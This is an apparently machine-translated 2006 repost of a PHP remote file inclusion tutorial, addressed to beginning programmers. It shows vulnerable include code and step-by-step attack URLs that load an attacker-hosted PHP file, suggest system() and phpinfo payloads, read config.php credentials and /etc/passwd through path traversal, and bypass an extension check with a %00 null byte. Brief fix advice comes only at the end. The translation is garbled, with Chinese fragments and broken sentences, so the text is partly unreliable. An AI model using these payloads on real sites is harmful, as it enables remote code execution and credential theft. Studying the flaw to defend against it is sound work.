php remote file inclusion vulnerability-vulnerability warning-the black bar safety net

2006-12-28T00:00:00
ID MYHACK58:62200613460
Type myhack58
Reporter 佚名
Modified 2006-12-28T00:00:00

Description

Author:Zizzy

Two years ago the article, to estimate for the php contains a vulnerability smattering of

2004-3-7 In this article I will tell php remote file inclusion vulnerability principle, the beginning involved a programmer who must-see. The first question is, what is”remote file inclusion vulnerability“for? The brief answer is the server through php any file containing the filter is not strict, so as to perform a malicious file, which is a programmer filtration on the issue, remember that all cgi programs have such a bug.

  1. Find the bug: In order to find the target, we first have to know that contain the two word meanings in all languages(most)this method contains any files. In php, we use the include()function, which is the workflow: 如果 你 在 Main.php 里 包含 include1.php I will write include("include1.php"). Not very scientific, but you want to know the truth. We first see this, when the user input through the post contains a file, that is

The CODE:

if ($_GET[page]) { include $_GET[page]; } else { include "home.php"; }

This structure in dynamic websites is common, the problem is that it allows such http://www.target.com/explame.php?page=main.php Or http://www.target.com/explame.php?page=downloads.php To view. Anyway, if your program has such a bug is also very sad, can only blame you, although just a filtering issue, but this is the way the filter will have a Script hacker. In the zone-h. org for investigation, the file containing the attack rate accounted for 9. 4%, enough of our attention, but it is also not a day or two of problems a few years ago would have, but today, a group of a group of programmers still go the old road to re-take, so there is this article, in 2 0 0 4-year write such articles have been corny, but I still want to write, after all the whining can let a person gains when it is not called whining.

  1. Test There's a remote file that contains the example, only one purpose, for you to program security, we look at specific http://www.target.com/explame.php?page=zizzy

Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3

Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/ usr/local/lib/php') in /var/www/htdocs/index.php on line 3

php output these error messages tell us, the program to contain the file/var/www/htdocs/zizzy, but didn't find, saw it, No such file or directory no such file, and now understand it.

  1. Use php is really good, you can remotely call the file, 那我创建一个yeah.txt,put in my station on the http://www. mysite. com/yeah. txt content like this

<? echo "Wow,test!"; ?& gt;

Then http://www.target.com/explame.php?page=http://www.mysite.com/yeah.txt OK,echo the Wow,test!, the So that you perform. Read the config. php is also not difficult to right, which put the mysql password. Put yeah. txt written into<? phpinfo; ?& gt;look, write to system()go and try, what do you think, in excessive point, so the submission page=../../../../../../../etc/passwd in. Know what the real contains.

  1. Another Sometimes programmers change the wording, written as thus, the limit comprises a range

if ($_GET[page]) { include "$_GET[page]. php"; } else { include "home.php"; }

We submitted

http://www.target.com/explame.php?page=http://www.mysite.com/yeah.txt

Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 4 0 4 Not Found in /var/www/htdocs/explame.php on line 3

Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/ usr/local/lib/php') in /var/www/htdocs/explame.php on line 3

Contains failed, to limit the extension named php,那 mysite.com 的 yeah.txt 改为 yeah.php,ok,still perform. That passwd?

Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 4 0 4 Not Found in /var/www/htdocs/explame.php on line 3

Warning: main(): Failed opening'../../../../../../../etc/passwd.php' for inclusion (include_path='.:/ usr/local/lib/php') in /var/www/htdocs/explame.php on line 3

Here the use of a NUL character, i.e.%0 0 to skip detection http://www.target.com/explame.php?page=../../../../../../../etc/passwd%00 Saw it.

  1. Recommendations Include file is best specified good contains which file, or filtered well presented variables, which is the aim of this article is not written to the hacking of people to see, but written for those beginning involved programmers, so the article online a lot, as long as people benefit, but also to achieve the purpose.

That is the jsp that contains the 4 an alternative way to write

<%@ include file="variables" %> <jsp:include page="variable" flush="true" /> pageContext. include("variables") <c:import url="<%= variable %>"/>